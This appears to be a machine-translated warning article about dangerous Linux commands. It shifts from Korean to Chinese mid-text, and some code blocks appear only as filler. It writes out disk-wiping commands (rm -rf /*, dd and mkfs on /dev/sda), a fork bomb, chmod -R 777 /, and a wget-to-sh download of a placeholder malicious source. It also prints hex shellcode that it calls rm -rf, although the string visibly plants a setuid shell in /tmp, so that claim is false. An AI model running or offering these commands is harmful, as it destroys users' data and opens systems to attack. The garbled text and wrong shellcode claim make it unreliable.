많은 사람들이 나에게 가장 위험한 Linux 명령이 무엇인지 묻습니다. 위험한 Linux 명령에 대한 명확한 목록이 없기 때문에 이 질문에 대한 답변을 피했습니다. 운영 체제의 모든 측면을 제어하고 수정할 수 있는 도구가 있습니다. 겁을 주려는 의도는 아니지만 이러한 명령과 도구에 익숙하지 않으면 시스템이 쉽게 손상될 수 있습니다. 가족 중 어린 자녀의 상황을 상상해 보세요. 아이들이 자해할 수 있는 방법은 여러 가지가 있습니다. 하지만 그렇다고 해서 우리가 아이들을 아기 침대에서 꺼내서는 안 된다는 뜻인가요? 이것은 그녀의 성장을 방해할 것이다. 이것이 바로 부모가 자녀에게 경계를 정하고 지도하는 것이 중요한 이유입니다. 화원에서 멀리 떨어져 있고 전기 소켓에 손가락을 넣지 마십시오... 자녀가 성장하고 경험을 쌓으면서 스토브를 켜고, 벽난로에 불을 붙이고, 전원 코드를 연결하는 방법을 배울 수 있습니다. 마찬가지로 알려진 위험한 명령을 알고 있다면 시스템을 방해하는 명령을 실행하도록 속이려는 트롤의 함정에 빠지는 것을 피할 수 있습니다. 경험을 쌓고 이러한 명령과 도구의 의미와 사용법을 알면 어리 석고 까다로운 명령으로 시스템을 손상시킬 가능성이 줄어 듭니다. 제 동료 Sreenath가 인기 있고 위험한 Linux 명령 몇 가지를 수집했습니다. 그들이 어떻게 리눅스 시스템을 무너뜨리는지 봅시다. “ 면책조항: 수행 중인 작업이 무엇인지 모르는 경우 이 문서에 언급된 명령을 시도하지 마십시오. 그렇지 않으면 위험을 감수하게 됩니다. ” 1.rm -rf /* 이것은 아마도 다양한 소셜 미디어에 떠도는 가장 악명 높은 명령일 것입니다. 다양한 토론에서 이를 언급하는 트롤을 자주 찾을 수 있습니다. rm 명령은 파일/디렉토리를 삭제하는 데 사용됩니다. 플래그 -r 和 -f는 지정된 디렉터리의 모든 파일을 반복적으로 삭제하는 것을 의미합니다. 이제 루트 권한이 없으면 이 명령은 아무런 해를 끼치지 않습니다. sudo rm -rf /🔗 itsfoss.com 명령을 실행해도 대부분의 배포판은 오류 방지 옵션을 제공하므로 문제가 발생하지 않습니다. 실제로 실행하려면 --no-preserve-root를 지정해야 합니다. 으아아아 그러나 더 간단한 버전은 다음과 같을 수 있습니다. 으아아아 루트 디렉터리의 모든 파일이 반복적으로 삭제되기 시작하고 일정 시간이 지나면 시스템이 정지되고 "파일 삭제 오류"가 표시됩니다. 재부팅하면 grub-rescue 프롬프트로 이동됩니다. 2. 파티션을 덮으세요 파일 시스템에 익숙하다면 /dev/sda 是什么。它(通常)是你的磁盘驱动器分区。> 연산자가 제공된 지정된 위치에 이전 명령의 출력을 기록하는 데 사용된다는 것을 알고 있을 것입니다. 명령을 실행하고 /dev/sda에 쓴 후 다음과 같이 말하세요. 으아아아 이렇게 하면 시스템을 부팅하는 데 필요한 모든 데이터가 포함된 파티션이 Hello 문자열로 대체됩니다. 3. 모든 것을 블랙홀로 옮기세요 모든 Linux 시스템에는 블랙홀이 있습니다. 그리고 이 블랙홀은 /dev/null. 이 영역에 무엇을 던지든 영원히 사라집니다. 더욱이, 데이터를 폐기한 후 쓰기 프로세스가 성공했다고 보고하는데, 이것이 데이터 파괴의 주된 이유입니다. mv /home/user/* /dev/null mv 命令🔗 linuxhandbook.com 用来移动或重命名文件/目录。在上面的命令中,你把家目录内的所有文件都移到了黑洞中。虽然根系统没有被破坏,但你所有的个人数据都会丢失。 4、格式化你的硬盘 mkfs🔗 linuxhandbook.com 是一个命令行工具,用于格式化磁盘和分区。它是一个超级方便的工具,可以为安装的操作系统创建分区。但同样的命令也可以格式化你的硬盘。格式化你的驱动器意味着删除系统启动所需的所有文件。 mkfs.ext3 /dev/sda 这个命令完成了它的工作,而你最终得到了一个无法恢复的混乱的系统。 5、fork 炸弹 这个看起来很可爱的特殊字符和符号的随机组合,足以通过耗尽系统资源来冻结一个正在运行的系统。 :(){ :|:& };: & – Shell 后台操作符。它通知 Shell 将命令放在后台。在这里,它定义了一个叫做 : 的函数,它调用自己两次,一次在前台,一次在后台。这个过程不断地重复执行,直到系统冻结。 顾名思义,它自己分叉,最终成为一个连锁炸弹,吃掉了所有的系统资源。你将被迫重启系统,这并不像本列表中的其他命令那样糟糕。 6、覆盖重要的配置文件 虽然这本身不是一个命令,但它更像是一个预防性的东西。 如上所述,> 操作符是用来向文件写入的。它丢弃文件中已经存在的东西,并将提供的新数据写入文件中。 command > config_filename 现在,如果你将一些重要的配置文件作为写数据的地方,它将被取代内容,留下一个损坏的系统。 7、用垃圾数据替换分区 /dev/random 是 Linux 中的一个命令,它可以创建垃圾数据。把它和 dd 命令🔗 linuxhandbook.com 以及你的分区结合起来,你就得到了一个可以让你的分区着火的燃烧弹。 dd if=/dev/random of=/dev/sda dd 命令被用作一个低级别的复制工具。这里,它从 /dev/random 中获取随机数据,并用这些垃圾替换 /dev/sda 分区。 一个类似的效果是通过以下方式获得的: cat /dev/urandom > filename 这里,它从 /dev/urandom(LCTT 译注:在 Linux 上,/dev/urandom 现在和 /dev/random 的等价的 )中获取垃圾数据并填入一个文件。如果不使用 Ctrl + C 终止,该文件会占据相当大的空间,这对低端系统来说可能是灾难性的。 8、将你的系统暴露给所有人 在 Linux 中,所有东西都是文件,每个 文件都有一定的权限🔗 linuxhandbook.com。 你可以用 ls -l 查看权限。根文件系统是不允许其他没有权限的用户访问的。虽然这保证了系统的私密性和安全性,但你可以用一个命令颠覆这个系统。 chmod -R 777 / 上述命令将根分区上的所有文件暴露给所有人。这意味着每个使用该系统的人都有读、写和执行的权限。这对你的系统是不利的。 9、下载并运行恶意的内容 你如何在 Linux 中安装软件?你可以使用官方的软件包管理器或随时可以使用的软件包,如 Deb/RPM、Snap、Flatpak 等。 然而,有些软件是没有打包的,它们的开发者提供了下载和运行的 Shell 脚本。以 Homebrew🔗 itsfoss.com 为例: 你下载一个 Shell 文件,然后以 root 身份运行它,在你的系统中安装一个软件。你看出问题了吗? 虽然它对 Homebrew 这样的官方软件有效,但在你像下面这样直接运行它之前,你应该仔细检查你所下载的 Shell 脚本的内容: wget http://malicious_source -O- | sh 这样的命令会在你的系统中下载并运行恶意脚本,这可能会破坏你的系统的安全性。 10、伪装的命令 在 Linux 终端中,有许多方法可以运行命令。其中一种方式是十六进制编码的命令: char esp[] __attribute__ ((section(“.text”))) /* e.s.prelease */= “\xeb\x3e\x5b\x31 \xc0\x50\x54\x5a\x83\xec\x64\x68”“\xff\xff\xff\xff\x68\xdf\xd0\xdf\xd9\x68\x8d\x99” “\xdf\x81\x68\x8d\x92\xdf\xd2\x54\x5e\xf7\x16\xf7” “\x56\x04\xf7\x56\x08\xf7\x56\x0c\x83\xc4\x74\x56” “\x8d\x73\x08\x56\x53\x54\x59\xb0\x0b\xcd\x80\x31” “\xc0\x40\xeb\xf9\xe8\xbd\xff\xff\xff\x2f\x62\x69”“\x6e\x2f\x73\x68\x00\x2d\x63\x00”“cp - p /bin/sh /tmp/.beyond; chmod 4755/tmp/.beyond;”; 虽然它看起来很花哨,但这是 rm -rf 命令的一个编码版本。它的效果与运行前面的命令相同。因此,在从互联网上复制和粘贴这些花哨的命令时,要小心谨慎。 总结 pebkac 有一个著名的计算机术语 PEBKAC:“问题存在于键盘和椅子之间(problem exists between keyboard and chair)”。 因为归根结底,还是要靠用户(你)来保证你不会因为盲目地运行任何危险的命令而破坏系统。 “ UNIX 的工作不是要阻止你搬起石头砸你自己的脚。如果你选择这样做,那么 UNIX 的工作就是以 它所知道的最有效的方式将石头砸到脚上。 ” 而这句话同样适用于 Linux。你可以完全控制你的操作系统。你选择做什么,完全取决于你。 我建议做这些事情以确保更安全的体验。 ◈ 尝试并理解你将要运行的命令。 ◈ 用 Timeshift 保持你的系统设置的备份 ◈ 用 DejaDup 保持个人数据(主目录)的备份 正如我所说,没有固定的危险 Linux 命令清单。还有很多可以添加到这个列表中,而且根本没有尽头。